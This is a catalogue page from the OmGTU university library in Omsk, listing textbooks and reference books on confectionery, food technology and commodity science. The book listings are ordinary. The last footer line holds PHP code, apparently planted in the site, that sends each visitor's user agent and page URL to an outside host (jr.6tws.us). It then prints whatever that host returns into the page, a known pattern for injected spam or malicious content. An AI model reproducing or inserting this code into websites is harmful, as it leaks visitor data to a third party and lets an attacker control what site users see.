Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

232 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ИЗДЕЛИЯ КОНДИТЕРСКИЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 57
1. 
Дубцов Г. Г. Технология приготовления пищи [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Г. Г. Дубцов, 2002. - 269 с.
Держатели документа (Информация об экземплярах) 
2. 
Барановский В. А. Продавец [Текст] : Учеб. пособие для уч-ся учеб. заведений нач. проф. образования / В. А. Барановский, Л. И. Рубцова, В. А. Тимофеева, 2003. - 447 с.
Ключевые слова 
ПРОДАВЕЦ -- ТОВАРОДВИЖЕНИЕ -- СЕТЬ ТОРГОВАЯ РОЗНИЧНАЯ -- ТОРГОВЛЯ РОЗНИЧНАЯ -- КООПЕРАЦИЯ ПОТРЕБИТЕЛЬСКАЯ -- МАГАЗИН - Планировка -- ЗАЛ ТОРГОВЫЙ -- ОБОРУДОВАНИЕ ТОРГОВОЕ -- ИНВЕНТАРЬ ТОРГОВЫЙ -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- ОБОРУДОВАНИЕ ПОДЪЕМНО - ТРАН -- АППАРАТ контрольно-кассовый -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ОБОРУДОВАНИЕ ВЕСОИЗМЕРИТЕЛЬН -- АССОРТИМЕНТ ТОВАРНЫЙ -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- ТОВАРООБОРОТ -- ПРИЕМКА ТОВАРОВ -- РАБОЧЕЕ МЕСТО продавца -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ТОВАРЫ МОЛОЧНЫЕ -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- РЫБА -- ТОВАРЫ ВКУСОВЫЕ -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- ТАБАК - ТОРГОВЛЯ -- ПРЯНОСТИ -- ПРИПРАВА -- НАПИТОК АЛКОГОЛЬНЫЙ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ТОВАРЫ текстильные -- ТОВАРЫ швейные -- ТОВАРЫ ТРИКОТАЖНЫЕ -- ТОВАРЫ ОБУВНЫЕ -- ТОВАРЫ ГАЛАНТЕРЕЙНЫЕ -- ТОВАРЫ ПАРФЮМЕРНО-КОСМЕТИЧЕС -- КУЛЬТТОВАРЫ -- ТОВАРЫ СТЕКЛЯННЫЕ -- ТОВАРЫ КЕРАМИЧЕСКИЕ -- ТОВАРЫ МЕТАЛЛОХОЗЯЙСТВЕННЫЕ
Держатели документа (Информация об экземплярах) 
3. 
Драгилев А. И. Технология кондитерских изделий [Текст] : Учеб. для студ. образоват. учреждений сред. проф. образования / А. И. Драгилев, И. С. Лурье, 2003. - 429 с.
Держатели документа (Информация об экземплярах) 
4. 
Скобельская З. Г. Технология производства сахарных кондитерских изделий [Текст] : Учеб. для учреждений нач. проф. образования / З. Г. Скобельская, Г. Н. Горячева, 2002. - 412 с.
Держатели документа (Информация об экземплярах) 
5. 
Анурин В. Ф. Маркетинговые исследования потребительского рынка [Текст] : Уникальный отечественный опыт: Учеб. пособие для студентов вузов / В. Ф. Анурин, И. И. Муромкина, Е. В. Евтушенко, 2004. - 269 с.
Держатели документа (Информация об экземплярах) 
6. 
Тимофеева В. А. Товароведение продовольственных товаров [Текст] : учеб. пособие для студ. образоват. учреждений сред. проф. образования / В. А. Тимофеева, 2003. - 447 с.
Держатели документа (Информация об экземплярах) 
7. 
Технологии пищевых производств [Текст] : учеб. для студентов высш. учеб. заведений / под общ. ред. А. П. Нечаева, 2005. - 767 с.
Ключевые слова 
ПИТАНИЕ - ЗДОРОВЬЕ -- ПИТАНИЕ НАСЕЛЕНИЯ -- ПРОДУКТЫ ПИЩЕВЫЕ -- БЕЛКИ - ПИТАНИЕ -- ЛИПИДЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАН -- ВОДА - ПИТАНИЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- СТАНДАРТИЗАЦИЯ ПРОДУКЦИИ ПИЩ -- СЕРТИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СЫРЬЕ ПИЩЕВОЕ -- ЗЕРНО - ПРОИЗВОДСТВО -- солод -- КРАХМАЛ - ПРОИЗВОДСТВО -- САХАР - ПРОИЗВОДСТВО -- МУКА ПШЕНИЧНАЯ - ГОСТ -- МОЛОКО - производство -- ЯЙЦЕПРОДУКТЫ -- ДОБАВКА ПИЩЕВАЯ -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- БАД -- ПРОБИОТИКИ -- ТЕХНОЛОГИЯ ПРОДУКЦИИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИРЫ - производство -- ПИВО - производство -- КВАС -- ДРОЖЖИ - производство -- кислота лимонная -- УКСУС -- КИСЛОТА молочная -- КОНЬЯК - производство -- ВИНОДЕЛИЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- КОНСЕРВЫ ОВОЩНЫЕ - ПРОИЗВОДС -- КОНСЕРВЫ ПЛОДООВОЩНЫЕ -- ЧАЙ - производство
Держатели документа (Информация об экземплярах) 
8. 
Радченко Л. А. Организация производства на предприятиях общественного питания [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Л. А. Радченко, 2005. - 347 с.
Держатели документа (Информация об экземплярах) 
9. 
Химический состав российских пищевых продуктов [Текст] : Справ. / под ред. И. М. Скурихина, В. А. Тутельяна, 2002. - 235 с.
Держатели документа (Информация об экземплярах) 
10. 
Сборник основных рецептур сахаристых кондитерских изделий [Текст] : сборник / Сост. Н. С. Павлова, 2003. - 230 с.
Держатели документа (Информация об экземплярах) 
11. 
Организация производства на предприятиях общественного питания [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт.-сост. Л. А. Радченко; Под ред. С. Н. Белоусовой, 2001. - 345 с.
Держатели документа (Информация об экземплярах) 
12. 
Рыжакова, Алла Владимировна. Товароведение и экспертиза кондитерских товаров [Текст] : Учебник гриф-УМО / А. В. Рыжакова, 2005. - 224 с.

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

13. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.

14. 
Организация производства на предприятиях общественного питания [Текст] : Учеб. пособие для учеб. заведений сред. проф. образования и учеб. заведений начал. проф. образования / Под ред. Белоусовой С. Н., 2000. - 345 с.
15. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
16. 
Кузнецова Л. С. Технология приготовления мучных кондитерских изделий [Текст] : Учеб. для студ. учрежд. сред. проф. образования / Л. С. Кузнецова, М. Ю. Сиданова, 2001. - 320 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
17. 
Шепелев А. Ф. Товароведение и экспертиза кондитерских товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, И. А. Печенежская, А. В. Шмелев. - 223 с.
18. 
Тимофеева В. А. Товароведение продовольственных товаров [Текст] : Учеб. пособие для студ. сред. проф.образования / В. А. Тимофеева, 2001. - 443 с.
Держатели документа (Информация об экземплярах) 
19. 
Товароведение и экспертиза продовольственных товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, И. А. Печенежская, О. И. Кожухова и др. - 677 с.
Держатели документа (Информация об экземплярах) 
20. 
Товароведение продовольственных товаров [Текст] : Конспект лекций / М. Бурова, 2000. - 142 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2931 - 19.06.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.11 с.12 запросов, 0.42c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;